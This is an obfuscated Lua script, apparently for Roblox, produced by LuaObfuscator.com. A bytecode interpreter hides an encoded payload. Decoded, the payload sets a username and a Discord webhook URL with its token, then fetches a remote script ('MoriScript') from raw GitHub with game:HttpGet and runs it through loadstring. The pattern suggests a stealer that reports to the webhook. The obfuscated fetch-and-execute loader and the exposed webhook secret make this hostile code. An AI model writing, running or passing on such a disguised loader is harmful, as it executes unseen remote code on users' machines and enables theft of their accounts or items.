--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(((1836 -(892 + 65)) -(282 + 595))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v82-(v82%((2222 -1290) -(857 + (136 -62)))) ;else local v83=568 -(367 + 201) ;local v84;while true do if (v83==(927 -(214 + 713))) then v84=(1 + 1)^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * (436 -(67 + 113))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -1)) then return (v41 * (12338840 + 4438376)) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 110 + 40))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;v37=1 -0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=998 -(915 + 82) ;local v45=(v20(v43,(3 -1) -1 ,20) * ((2 + 0)^(41 -9))) + v42 ;local v46=v20(v43,1208 -((1507 -(145 + 293)) + 118) ,31);local v47=((v20(v43,(502 -(44 + 386)) -40 )==(1 -0)) and  -1) or ((1487 -(998 + 488)) + 0) ;if (v46==(0 -(0 + 0))) then if (v45==0) then return v47 * (0 + 0) ;else v46=792 -(368 + 423) ;v44=0 -0 ;end elseif (v46==(2065 -(9 + 1 + 8))) then return ((v45==0) and (v47 * ((3 -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -(3015 -(201 + 571))) ) * (v44 + (v45/(2^(23 + 29)))) ;end local function v25(v48)local v49=1138 -(116 + 1022) ;local v50;local v51;while true do if (v49==(7 -4)) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==((0 + 0) -0)) then return "";end end v49=1 + 0 ;end if (v49==(3 -1)) then v51={};for v89=1, #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=1083 -(1020 + 60) ;end if (v49==((4902 -3478) -(630 + 793))) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=114 -(4 + 110) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((585 -(57 + 527))==v52) then v55=nil;v56=nil;v52=6 -4 ;end if (v52==4) then while true do if (v53==0) then local v95=0 + 0 ;local v96;while true do if (v95==(1427 -(41 + 1386))) then v96=103 -(17 + 86) ;while true do if (v96==(1899 -(260 + 1638))) then v53=441 -(382 + 58) ;break;end if (v96==(0 -0)) then v54=0 + 0 ;v55=nil;v96=1 -0 ;end end break;end end end if (v53~=(2 + 0)) then else local v97=0 -0 ;while true do if (0~=v97) then else v58=nil;v59=nil;v97=1206 -(902 + 303) ;end if ((1 -0)~=v97) then else v53=6 -3 ;break;end end end if (v53==(6 -3)) then v60=nil;while true do local v100=0;local v101;while true do if (v100==(0 -0)) then v101=0 + 0 ;while true do if (v101==0) then local v142=0;local v143;while true do if (v142~=(166 -(122 + 44))) then else v143=1690 -(1121 + 569) ;while true do if (v143==1) then v101=215 -(22 + 192) ;break;end if (v143==(0 -0)) then local v155=0;while true do if (v155~=(3 -2)) then else v143=1 + 0 ;break;end if (v155==(0 + 0)) then if ((3 -1)==v54) then local v157=65 -(30 + 35) ;local v158;while true do if (v157~=(0 + 0)) then else v158=1257 -(1043 + 214) ;while true do if (v158==(563 -(334 + 228))) then for v164=3 -2 ,v23() do local v165=0;local v166;local v167;local v168;local v169;while true do if (v165~=(1212 -(323 + 889))) then else v166=0 -0 ;v167=nil;v165=1 -0 ;end if (1==v165) then v168=nil;v169=nil;v165=2;end if (v165==(1 + 1)) then while true do if (0==v166) then local v173=0 -0 ;while true do if (v173==0) then v167=0 + 0 ;v168=nil;v173=581 -(361 + 219) ;end if (v173==1) then v166=2 -1 ;break;end end end if (1==v166) then v169=nil;while true do if (v167==(320 -(53 + 267))) then local v175=0 + 0 ;while true do if (v175~=(0 -0)) then else v168=0 + 0 ;v169=nil;v175=1;end if (v175==1) then v167=1;break;end end end if (v167~=(1 + 0)) then else while true do if (v168==0) then v169=v21();if (v20(v169,414 -(15 + 398) ,983 -(18 + 964) )==(0 + 0)) then local v182=0;local v183;local v184;local v185;local v186;local v187;while true do if (v182==(3 -2)) then v185=nil;v186=nil;v182=2;end if ((2 + 0)==v182) then v187=nil;while true do if (v183==(1 + 0)) then v186=nil;v187=nil;v183=2 + 0 ;end if (v183~=(850 -(20 + 830))) then else v184=0;v185=nil;v183=1 -0 ;end if (v183~=(2 + 0)) then else while true do if (v184==(2 + 0)) then local v191=0;local v192;while true do if (v191==(126 -(116 + 10))) then v192=0 + 0 ;while true do if (v192==(739 -(542 + 196))) then v184=6 -3 ;break;end if (v192==0) then local v203=0;while true do if (v203==(850 -(254 + 595))) then v192=1;break;end if (0==v203) then if (v20(v186,1 + 0 ,1 + 0 )==(1 -0)) then v187[2]=v60[v187[1 + 1 ]];end if (v20(v186,4 -2 ,2)~=1) then else v187[7 -4 ]=v60[v187[3]];end v203=1552 -(1126 + 425) ;end end end end break;end end end if (v184~=(406 -(118 + 287))) then else local v193=939 -(714 + 225) ;while true do if (v193==(0 -0)) then v187={v22(),v22(),nil,nil};if (v185==(0 -0)) then local v200=0 + 0 ;local v201;local v202;while true do if ((807 -(118 + 688))==v200) then while true do if (v201~=(977 -(553 + 424))) then else v202=0 -0 ;while true do if (v202==(0 + 0)) then v187[3]=v22();v187[1890 -(927 + 959) ]=v22();break;end end break;end end break;end if (v200~=(0 + 0)) then else v201=0 + 0 ;v202=nil;v200=1 + 0 ;end end elseif (v185==(733 -(16 + 716))) then v187[5 -2 ]=v23();elseif (v185==(1 + 1)) then v187[2 + 1 ]=v23() -((287 -(175 + 110))^(34 -18)) ;elseif (v185~=(7 -4)) then else local v211=0 -0 ;while true do if (v211~=(0 + 0)) then else v187[3]=v23() -((9 -7)^(12 + 4)) ;v187[757 -(239 + 514) ]=v22();break;end end end v193=1062 -(810 + 251) ;end if (v193==(1 + 0)) then v184=1331 -(797 + 532) ;break;end end end if ((0 + 0)==v184) then local v194=0 + 0 ;local v195;while true do if (v194==0) then v195=0 + 0 ;while true do if (1~=v195) then else v184=734 -(711 + 22) ;break;end if (v195==(0 -0)) then local v204=859 -(240 + 619) ;while true do if (v204==(1202 -(373 + 829))) then v185=v20(v169,2,3);v186=v20(v169,4,2 + 4 );v204=1 -0 ;end if (v204==(732 -(476 + 255))) then v195=1745 -(1344 + 400) ;break;end end end end break;end end end if (v184~=(1133 -(369 + 761))) then else if (v20(v186,2 + 1 ,2 + 1 )==(1 -0)) then v187[16 -12 ]=v60[v187[4]];end v55[v164]=v187;break;end end break;end end break;end if ((0 -0)==v182) then v183=0 -0 ;v184=nil;v182=1740 -(404 + 1335) ;end end end break;end end break;end end break;end end break;end end end v54=241 -(64 + 174) ;break;end if (v158==(0 + 0)) then local v162=0 -0 ;local v163;while true do if (v162~=(0 -0)) then else v163=336 -(144 + 192) ;while true do if (v163~=(216 -(42 + 174))) then else local v172=0 + 0 ;while true do if (v172==(1 + 0)) then v163=338 -(10 + 327) ;break;end if (v172~=(0 + 0)) then else for v176=339 -(118 + 220) ,v59 do local v177=0 + 0 ;local v178;local v179;local v180;local v181;while true do if (v177==(1 + 0)) then v180=nil;v181=nil;v177=1506 -(363 + 1141) ;end if (v177==0) then v178=1580 -(1183 + 397) ;v179=nil;v177=1 + 0 ;end if (v177==(5 -3)) then while true do if (v178~=1) then else v181=nil;while true do if (0==v179) then local v188=0;local v189;while true do if (v188~=0) then else v189=0 + 0 ;while true do if ((0 + 0)~=v189) then else local v197=0;while true do if (v197~=0) then else v180=v21();v181=nil;v197=470 -(270 + 199) ;end if (v197==(1 + 0)) then v189=1;break;end end end if (v189==(1820 -(580 + 1239))) then v179=2 -1 ;break;end end break;end end end if (v179==(1976 -(1913 + 62))) then if (v180==(1 + 0)) then v181=v21()~=(0 -0) ;elseif (v180==2) then v181=v24();elseif (v180~=(2 + 1)) then else v181=v25();end v60[v176]=v181;break;end end break;end if (v178==(0 -0)) then v179=0;v180=nil;v178=1934 -(565 + 1368) ;end end break;end end end v58[3]=v21();v172=3 -2 ;end end end if (v163==(1662 -(1477 + 184))) then v158=1791 -(1010 + 780) ;break;end end break;end end end end break;end end end if (v54~=(3 -0)) then else local v159=0 + 0 ;local v160;while true do if (v159==(856 -(564 + 292))) then v160=0 -0 ;while true do if (v160==(0 -0)) then for v170=2 -1 ,v23() do v56[v170-(305 -(244 + 60)) ]=v28();end return v58;end end break;end end end v155=1 -0 ;end end end end break;end end end if ((1 + 0)~=v101) then else if (v54~=(505 -(351 + 154))) then else local v146=476 -(41 + 435) ;while true do if ((266 -(28 + 238))==v146) then local v154=0;while true do if (v154==0) then local v156=1001 -(938 + 63) ;while true do if (v156==(0 + 0)) then v55={};v56={};v156=1126 -(936 + 189) ;end if (v156==(1 + 0)) then v154=1614 -(1565 + 48) ;break;end end end if (v154==(1 + 0)) then v146=1 + 0 ;break;end end end if (v146~=(3 -2)) then else v57={};v54=1;break;end end end if (v54==(1139 -(782 + 356))) then local v147=0;local v148;local v149;while true do if (v147==(267 -(176 + 91))) then v148=0 -0 ;v149=nil;v147=1 -0 ;end if (v147==1) then while true do if (v148~=(0 + 0)) then else v149=1092 -(975 + 117) ;while true do if (v149==(1156 -(1074 + 82))) then local v161=1875 -(157 + 1718) ;while true do if ((1785 -(214 + 1570))==v161) then v149=1;break;end if ((0 + 0)==v161) then v58={v55,v56,nil,v57};v59=v23();v161=2 -1 ;end end end if (v149==1) then v60={};v54=3 -1 ;break;end end break;end end break;end end end break;end end break;end end end break;end if (v53~=(2 -1)) then else local v98=0 + 0 ;local v99;while true do if (v98~=0) then else v99=0 -0 ;while true do if (v99==(2 -1)) then v53=1229 -(322 + 905) ;break;end if (v99~=(0 -0)) then else v56=nil;v57=nil;v99=612 -(602 + 9) ;end end break;end end end end break;end if ((626 -(512 + 114))~=v52) then else v53=1189 -(449 + 740) ;v54=nil;v52=1;end if (v52==(5 -3)) then v57=nil;v58=nil;v52=875 -(826 + 46) ;end if (v52==3) then v59=nil;v60=nil;v52=8 -4 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=8) then if (v80<=3) then if (v80<=1) then if (v80==0) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v79[3];end elseif (v80==2) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=5) then if (v80>4) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=6) then do return;end elseif (v80>7) then local v131=v79[2];v77[v131]=v77[v131](v13(v77,v131 + 1 ,v72));else local v133=0;local v134;local v135;local v136;local v137;while true do if (v133==1) then v72=(v136 + v134) -1 ;v137=0;v133=2;end if (v133==0) then v134=v79[2];v135,v136=v70(v77[v134](v13(v77,v134 + 1 ,v79[3])));v133=1;end if (v133==2) then for v151=v134,v72 do v137=v137 + 1 ;v77[v151]=v135[v137];end break;end end end elseif (v80<=12) then if (v80<=10) then if (v80>9) then v77[v79[2]]();else local v112=v79[2];local v113=v77[v79[3]];v77[v112 + 1 ]=v113;v77[v112]=v113[v79[4]];end elseif (v80==11) then local v117=0;local v118;while true do if (0==v117) then v118=v79[2];v77[v118]=v77[v118](v13(v77,v118 + 1 ,v72));break;end end else local v119=v79[2];local v120,v121=v70(v77[v119](v13(v77,v119 + 1 ,v79[3])));v72=(v121 + v119) -1 ;local v122=0;for v128=v119,v72 do v122=v122 + 1 ;v77[v128]=v120[v122];end end elseif (v80<=14) then if (v80==13) then local v123=v79[2];local v124=v77[v79[3]];v77[v123 + 1 ]=v124;v77[v123]=v124[v79[4]];else do return;end end elseif (v80<=15) then v77[v79[2]]();elseif (v80==16) then v77[v79[2]]=v79[3];else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503093O00796F6C6F6B6F73742003093O00557365724E616D653203073O00576562682O6F6B037A3O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O3937323336373532333932363039362F765668394F2D44786A4B5863737A644D554C6B53466C6F484D687770567451624F397665556A5F7A6B346241596445766E3078336A4549632D6C7337465F64494E31777920030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012053O00013O00304O000200030012053O00013O00304O000400030012053O00013O00304O000500060012053O00073O001205000100083O0020090001000100090012010003000A4O0003000400014O000C000100044O000B5O00022O000A3O000100012O00063O00017O00",v9(),...);end
